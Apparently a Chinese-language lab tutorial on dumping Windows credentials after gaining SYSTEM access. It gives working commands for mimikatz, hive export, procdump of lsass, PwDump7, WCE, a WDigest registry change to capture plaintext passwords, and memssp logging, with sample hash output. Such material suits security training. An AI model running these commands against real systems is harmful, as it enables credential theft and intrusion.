本文首發(fā)烏鴉安全知識星球！

公眾號：烏鴉安全

更新時間：2022.08.04

1. 說明

本文參考了大量的第三方文檔，參考資料如下，感謝各位師傅的幫助。

https://www.secrss.com/articles/24903 https://mp.weixin.qq.com/s/jW2tUXkiBaC6PiF-kRWb1Q https://mp.weixin.qq.com/s/As4YZ8XDWCfBfieDUU30Ow https://mp.weixin.qq.com/s/4nlyOIuyQZ9h0Bb5jQO4wQ https://mp.weixin.qq.com/s/PDVs6zCuEsnpfzPIFI-XJw https://mp.weixin.qq.com/s/-pijbPocXG8bSDU-l4i4RA https://zhuanlan.zhihu.com/p/57800688 https://mp.weixin.qq.com/s/PDVs6zCuEsnpfzPIFI-XJw https://xz.aliyun.com/t/10734#toc-2

2. Windows獲取憑證或密碼

一般來說，在我們獲取到Windows的system權限之后，一般都喜歡去看下密碼，哪怕是hash，也想嘗試去解一下，Windows下的安全認證機制總共有兩種，一種是基于NTLM的認證方式，主要用在早期的Windows工作組環(huán)境中；另一種是基于Kerberos的認證方式，主要用在域環(huán)境中。
關于NTLM的知識，在這里就不在展開了，有興趣的可以去搜下。

3. 環(huán)境準備

本次環(huán)境共準備了Windows server2003、Windows7、Windows10、Windows server2012，按照他們的特點，有針對的進行實操獲取。
本文默認已獲取system權限的情況下進行操作。

4. 獲取密碼或hash方法

4.1 ** Mimikatz**

這個神器肯定是大家都不陌生的， 以前我也寫過關于這個工具的免殺。
原版工具：https://github.com/gentilkiwi/mimikatz

使用方法：

privilege::debug 提升權限，返回Privilege '20' OK。說明權限提升成功 sekurlsa::logonpasswords 可以讀取到NTLM哈希值

4.1.1 server2003

systeminfo查看當前的電腦是32位的，所以在這里就使用32位的來試下：

執(zhí)行命令之后可以直接獲取到明文：

privilege::debug sekurlsa::logonpasswords

4.1.2 windows10

在這里先關閉Windows10的Windows defender，在這里并不對其進行免殺研究，直接使用x64位的之后，來獲取hash：

執(zhí)行命令之后只能夠獲取hash，不能夠直接獲取明文：

209c6174da490caeb422f3fa5a7ae634

可以通過第三方的方式來獲取密碼：

當然，mimikatz也可以使用非交互的方式來獲取hash：

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

4.2 注冊表導出hash

有時候，因為某些問題，導致無法直接獲取hash，所以在這里還可以使用注冊表導出hash的方式來進行，具體的步驟如下：
在靶機上使用以下命令（需要system權限）：

靶機上執(zhí)行： reg save HKLM\SYSTEM system.hivreg save HKLM\SAM sam.hivreg save hklm\security security.hiv在本地使用mimikatz執(zhí)行： mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

4.2.1 server2003

打開cmd執(zhí)行命令，導出system.hiv，sam.hiv，security.hiv文件：

reg save HKLM\SYSTEM system.hiv reg save HKLM\SAM sam.hiv reg save hklm\security security.hiv

最后使用mimikatz執(zhí)行，在非靶標機器上，不需要system權限：

mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

RID : 000001f4 (500) User : AdministratorHash LM : f0d412bd764ffe81aad3b435b51404eeHash NTLM: 209c6174da490caeb422f3fa5a7ae634

直接去查詢即可。

4.2.2 Windows10

使用同樣的方法導出之后再解密：

獲取到hash信息：

User : adminHash NTLM: 209c6174da490caeb422f3fa5a7ae634

4.3 pass64.exe

這個文件是我早些時候滲透的時候獲得的，在win7、8等低于Windows10的系統(tǒng)上（這種說法不嚴謹），使用system權限運行能夠直接獲取64位系統(tǒng)的賬號和密碼信息。
這個工具應該是PwDump7工具的魔改版本。
在win10上因為無法獲取賬號密碼報錯：

win7環(huán)境下：

4.4 PwDump7

https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump7.zip

4.4.1 server2003

可以在Windows2003上執(zhí)行，手工將得到的結果保存在1.txt中：
PwDump7.exe > 1.txt

Administrator:500:F0D412BD764FFE81AAD3B435B51404EE:209C6174DA490CAEB422F3FA5A7AE634::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: SUPPORT_388945a0:1001:NO PASSWORD*********************:E0BD9A807066324A42B519FF5BEFF787::: IUSR_TEST-D19EBC014E:1003:D4A491469B36E4DEDFF5B37B55778470:2471C03E798817564147AAA062FE8E22::: IWAM_TEST-D19EBC014E:1004:CE5EF4E001CFA44F29C8D4F0A6CA5261:15F2DD2C17E53DD2FB0E43A1F6B1DFD6::: ASPNET:1006:6FF5F98464BA40B4762AEFFACC0990D3:E1C2E3693E2A0392D8F625BB47CA78C1::: test:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::

4.4.2 windows10

4.5 Procdump+Mimikatz

ProcDump是一個命令行程序，可以將系統(tǒng)正在運行的進程轉存儲生成為dump文件，微軟自己的工具，理論上來說不應該會被殺。
它的原理是Procdump導出lsass.exe的轉儲文件，使用mimikatz讀取器中的hash。
如果對方機器是win10以下的，都可以獲取明文密碼。

地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
使用方法：
先dump出lsass.exe：

32位： procdump.exe -accepteula -ma lsass.exe lsass.dmp64位： procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

mimikatz讀取：

sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full

4.5.1 server2003

無法使用

4.5.2 Windows10

執(zhí)行命令：

procdump.exe -accepteula -ma lsass.exe lsass.dmp

然后使用mimikatz讀取：

sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full

4.6 WCE

官網(wǎng)地址：
https://www.ampliasecurity.com/research.html
32位下載：
https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
64位下載：
https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

參數(shù)解釋: -l 列出登錄的會話和NTLM憑據(jù)（默認值） -s 修改當前登錄會話的NTLM憑據(jù) 參數(shù)：<用戶名>:<域名>:<LM哈希>:<NT哈希> -r 不定期的列出登錄的會話和NTLM憑據(jù)，如果找到新的會話，那么每5秒重新列出一次 -c 用一個特殊的NTML憑據(jù)運行一個新的會話 參數(shù)：<cmd> -e 不定期的列出登錄的會話和NTLM憑據(jù)，當產(chǎn)生一個登錄事件的時候重新列出一次 -o 保存所有的輸出到一個文件 參數(shù):<文件名> -i 指定一個LUID代替使用當前登錄會話 參數(shù):<luid> -d 從登錄會話中刪除NTLM憑據(jù) 參數(shù):<luid> -a 使用地址 參數(shù): <地址> -f 強制使用安全模式 -g 生成LM和NT的哈希 參數(shù)<密碼> -K 緩存kerberos票據(jù)到一個文件（unix和windows wce格式） -k 從一個文件中讀取kerberos票據(jù)并插入到windows緩存中 -w 通過摘要式認證緩存一個明文的密碼 -v 詳細輸出

使用方法：wce.exe -l或者直接wce。

4.6.1 server2003

4.6.2 Windows10

無法使用：

4.6.3 Windows7

正常執(zhí)行：

4.7 SqlDumper + mimikatz（失敗）

因為沒有安裝sqlserver，可能導致最后無法執(zhí)行成功。
可以從https://www.xiazaiba.com/html/35382.html下載工具（我在win10 defender下是默認無毒的）
首先查看下當前l(fā)sass.exe的進程號：
tasklist /svc |findstr lsass.exe

找到Sqldumper.exe的安裝路徑，使用管理員權限的cmd導出dump文件，使用方法：

Sqldumper.exe ProcessID 0 0x01100

在這里使用就是：（失敗）

放一個成功的圖：

3.mimikatz加載dump文件
mimikatz.exe"sekurlsa::minidumpSQLDmpr0001.mdmp"“sekurlsa::logonPasswords full”“exit”

5. Windows獲取明文密碼

在這里主要是獲取Windows高版本的明文密碼，因為在Windows2012系統(tǒng)及以上的系統(tǒng)，默認在內(nèi)存緩存中禁止保存明文密碼的。攻擊者可以通過修改注冊表的方式抓取明文，需要用戶重新登錄后才能成功抓取。
本次環(huán)境Windows server2012，本文默認已獲取system權限的情況下進行操作。
而且本文不討論抓取密碼工具或方法的免殺方式。

6. 獲取明文密碼方法

6.1 修改注冊表

前提條件：

• system權限
• 需要鎖屏后重新登錄

在這里依舊使用mimikatz進行密碼的抓取，默認情況下是無法獲取明文信息的：

privilege::debug 提升權限，返回Privilege '20' OK。說明權限提升成功 sekurlsa::logonpasswords 可以讀取到NTLM哈希值

使用命令行將其修改成記錄明文密碼，在這里需要注意使用管理員權限來執(zhí)行：

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

再使用命令鎖屏：（這個命令可以使用用戶權限來執(zhí)行）

rundll32.exe user32.dll,LockWorkStation

接下來等待用戶再次登錄一次就可以抓到了：

如果說在修改之后抓取到了密碼，想要恢復對方的注冊表，只需要執(zhí)行下面的命令即可：（依舊需要使用管理員權限）

修改不記錄明文密碼 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

再次重啟下就可以了：（鎖屏無效）

privilege::debug 提升權限，返回Privilege '20' OK。說明權限提升成功 sekurlsa::logonpasswords 可以讀取到NTLM哈希值

6.2 mimikatz插ssp記錄密碼

需要的條件：

• system權限
• 鎖屏并重新登入

在這里使用mimikatz來實現(xiàn)：

privilege::debugmisc::memssp

修改完之后使用以下命令鎖屏：rundll32.exe user32.dll,LockWorkStation
然后在以下目錄下發(fā)現(xiàn)明文密碼：

C:\Windows\System32\mimilsa.log

7. 總結

其實還有很多的其他方法，在這里就不進行一個個演示了，而且在這里并沒有對其是否免殺的能力進行測試，對于不同的環(huán)境，免殺的方法也不相同，等以后有時間再學習下。

總結

以上是生活随笔為你收集整理的Windows密码凭证获取学习的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。